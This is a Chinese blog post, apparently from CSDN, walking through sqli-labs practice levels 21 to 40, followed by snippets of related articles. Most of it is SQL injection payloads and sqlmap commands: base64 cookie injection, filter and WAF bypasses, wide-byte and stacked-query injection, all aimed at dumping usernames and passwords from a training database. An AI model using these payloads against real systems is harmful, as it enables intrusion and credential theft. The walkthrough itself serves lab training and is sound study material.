sqli靶场21-40关

最新推荐文章于 2023-02-17 13:01:50 发布
最新推荐文章于 2023-02-17 13:01:50 发布
阅读量4.7k 收藏
点赞数 1
文章标签: xss 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46976845/article/details/123745295
版权

21.cookie注入
首先需要登录账号,登录后会抓到一个cookie的包
这个cookie就是一个注入点,而且经过base64加密,提交的shellcode也需要base64加密。
在这里插入图片描述
在这里插入图片描述
‘) or 1=1 #
加密后
Jykgb3IgMT0xICM=
在这里插入图片描述
跑sqlmap方法
sqlmap -u “http://192.168.207.253/sqli-lab/Less-21/index.php” --cookie=“uname=” --time-sec=2 --level 3 --threads=10 --tables --tamper base64encode -v 5
跑的有点久,但是跑出来了
在这里插入图片描述
22.cookie注入
和上题一样,只是换成了双引号闭合
跑sqlmap
在这里插入图片描述
23.注释符号过滤
qing’ union select 1,group_concat(username),group_concat(password) from users where 1 or ‘1’ = ’
在这里插入图片描述

跑sqlmap
sqlmap跑不出来,pass

24.二次注入
账号注册 admin’ or 1=1#
登录账号时触发。所有密码都变成了123456
这道题跑不了sqlmap

25.注入过滤
id=1’ oorr ‘1’='1
跑sqlmap,2000条跑不出来,pass

25a

和25关一样,没有单引号
?id=-1 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=‘security’ --+

26.过滤
单引号闭合 过滤了 or,and , /* , – , # , 空格 , /

qing’%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0’1

26a

比26多一个闭合括号

27.大小写过多过滤

0’%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0’1

27a.
闭合不一样
0"%A0or(1)=(1)%26%26%a0"1

?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema=‘security’%26%26%a0"1

?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0"1

过滤union select这一个组合,也要过滤空格,所以采用union union select select方法绕过,空格照样用%0a替换

0’)%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0('1

28a.
一样的原理

29.弱waf
加了一个很弱的"waf…"

注入方法就是参数污染

例子 显示的是id=2的内容 但是waf检测的是前面id=1的内容
?id=’ union select 1,version(),database() --+

?id=’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ --+

id=’ union select 1,group_concat(username),group_concat(password) from security.users where 1 --+

29一样

和29一样

简单说check_addslashes函数把\ 单引号 双引号都进行过滤转义

明显的编码gbk 宽字节注入 不用多说

?id=-1%df%27 UNion seleCt 1,2,DATABASE()–+

同上

变成32 33 post的方式而已 没意义

id没有被单引号括起来所以addslashes起不到作用

正常各种payload即可:

?id=-1x and extractvalue(1,concat(0x7e,(select database()),0x7e))–+

mysql_real_escape_string转义 还是一样不多说

post登录

uname=admin%df%27 or 1=2 union select 1,database()#

mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。(有这个才能进行堆叠)
分号我们可以加入注入的新的语句

堆叠注入

?id=2%FE' or 1=1 %23

?id=0%FE’ union select 1,version(),database() %23

?id=0%FE’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

?id=0%FE’ union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

参考38

参考38

hq_hq_cnhonker
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQli-labs 进阶 21-38
感恩
09-15 331
SQLI-LAB less21~38
sqli-labs靶场练习Less-21~30(持续更新)--ch4nge
ch4nge
10-28 743
Less21-30 作者:ch4nge 目录Less21-30Less21·cookie·E·base64encode手注sqlmapLess 22·cookie·E·base64encode手注sqlmapLess 23·Less 24·二次注入 Less21·cookie·E·base64encode Base64encode之后注入 注入操作同20 登录框没有注入点 setcookie('uname', base64_encode($row1['username']), time()+3600);
sqli-labs靶场第二十一
gou1791241251的博客
12-31 1225
有点特别,虽然是cookie注入,但是是经过编码的 发现cookie那里的值为RHVtYg== 非常像base64编码过的。我们就来尝试一下经过编码再进行注入 把单引号经过编码之后再放入cookie中。 发现报错了!说明闭合方式是有单引号的,那么就先不考虑双引号了!! 这里我将’ and 1=1 # 经过编码放入cookie中请求,发现还是报错,说明闭合方式不仅仅是单引号! 尝试一下括号。 页面没有报错了,说明闭合方式就是 ‘) 那么现在用报错注入来进行获取一下信息吧 ‘) and ex
Sqli-Labs靶场(21--25a)题解析
weixin_46099095的博客
03-16 2406
Less-21:Cookie Injection - base64 encoded - single quotes and parenthesis(Cookie注入 - base64 编码 - 单引号和括号) Cookie型注入,来嘛,burp抓包 哈!这一串乱码是啥,好像是base16编码,那么就是说,是不是把上题用到的语句给他base16编码处理一下就好了,来吧,直入主题 果然!那么有同学就问了,为啥是admin')?来我们把-admin' union select 1,2,3#用b.
Sqlilabs-21
KAKA的博客
07-09 617
来到了第 21 ,看着 21 ,我知道,第一阶段快结束了,马上要到…啪…给我认真写博文… 这一卡的题目给内容貌似一点都不符合…还是得从 cookie 下手,但肯定不跟20 一样,通过提交正常的数据,我们可以看到,COOKIE 长的有点不太一样… Base64Decode 解码 YWRtaW4= 得到的结果是 admin,所以说后台将 COOKIE 进行了 Base64 的编码,所以构造 payload 时,应该在 cookie 类似于:[得先正确登入] uname=YWRtaW4nKSBhbm
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
phpstudy+靶场sqli-labs-master下载
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs-master靶场
07-14
sqli-labs-master靶场
SQLi Labs Lesson21
1ame的博客
08-17 294
Lesson - 21 POST -Cookie Injection  - Error Based - Complex - string 该网页的框架和上节类似,只不过在setcookie时对cookie进行base64_encode: if(!isset($_COOKIE['uname'])) { //声明实现过滤函数check_input function c
sqli-labs21基于cookie报错注入(base64转码)
qq_46527080的博客
12-25 535
21基于cookie报错注入 其实测试语句和20差不多,但是需要转码,转成base64再带入到cookie中,然后(base64在bp中有模块) 一、判断注入点 没转码之前 ' )and extractvalue(1,concat(0x7e,( 1),0x7e))# JyApYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLCggMSksMHg3ZSkpIyA= (这里的思想是先不用闭合点,进行转码,一点一点试出来,然后报错出1的话,就是闭合点) 二、爆库 ' )a
sqli-labs靶场技巧(21-45)
ldzhhh的博客
08-03 474
Less21 基于’)的cookie报头注入 这里在cookie处加密了字符串,将我们的payload经过base64加密即可绕过 暴库payload:-admin') union select 1,2,database()# 爆表payload:-admin') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'# 爆字段payload:
sqli-labs-master第21、22
m_ing
05-16 1565
前言:昨天我们研究了http头部cookie注入,反正我是让让抓包软件给搞死了,废了老半天劲!我们来研究下加密后的cookie 第21: 看到这个页面我们还是输入用户密码,返回了这个页面 提示了一系列的信息 我们还是抓包分析下 看到了加密后的cookie 我们查看源代码,看看是怎样的加密方式 是被base64加码算法加密了 我们找个解密软件或者相的程序 我们输入的用户就是admin所以解密正确 先构造语句验证是否存在注入,admin’经过base64编码后YWRtaW4n,带入测试发现报错
sqli-labs第二十一二十二
m0_73248913的博客
02-17 228
sqlilabs第二十一二十二
sqli-labs第二十一和二十二(加密cookie注入)
qq_42266432的博客
08-31 447
进入到第21,登录admin,发现这还是cookie注入,只不过cookie和上一有点不同,被加密了,于是将YWRtaW4复制下来,找一个加解密工具解密,由于加密未设偏移量啥的,所以很轻松就能发现使用的是base64加密做到这里的话,思路和上一一样了 使用burp抓包,并将cookie后加个n 页面回显错误 寻找闭合,将cookie修改为YWRtaW4nKSM=,即base64加密后的admin’)#,结果如上图,闭合成功 YWRtaW4nKSBvcmRlciBieSA0Iw==为加密后的admi.
sqli-labs 21 - 30
weixin_44843084的博客
05-29 360
sqli-labs 21 - 30 less21 登陆后 cookie的uname值是base64加密 试了几次,格式是’) 依旧是3列 剩下的跟上题一样 less22 跟上一题一样,格式是" less23 又回到get了[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 闭合是’ 直接注释好像有什么问题(应该是被过滤了 语句可能是类似id=’$id’ limit 0,1?(好像真的是 这样是可以的 但是不能1' order by 4 and '1'='1(还是上图
sql注入21-27
qq_45751902的博客
04-01 3071
21 经过这两个可知,有加密,在网上找大佬的解法说,使用了base64加密 解密后 base64编解码地址: https://tool.oschina.net/encrypt?type=3 可以推出,我们需要在burp suite上将编码后的内容输入 ') and updatexml(1,concat(0x7e,database(),0x7e),1)# ') union select 1,2, updatexml(1,concat(0x7e,database(),0x7e),1)# 同时因为有回
sqli-labs解题大法21~28a
weixin_43733035的博客
01-23 591
Less-21: 第21,根据前面18之后的经验,我决定先登录一下试试,然后… 瞬间爆炸了有木有,一堆英文完全看不懂啥意思,不过幸好有百度翻译, emmmm,好像没什么用,该没看懂还是没看懂,不过看到有user-agent和http,就决定先用' and union select 1,2,3#试一下,发现语句会直接输出,并没有注入。 然而,当我在cookie之中写payload时页面出现了...
sqli-labs————less 21
Fly_鹏程万里
05-12 1552
Less-21做一个简单测试:username:adminpassword:aaa这里的界面和上一的内容差不多,唯一的区别就是cookie使用了base64进行了加密,这里我们贴出该的代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值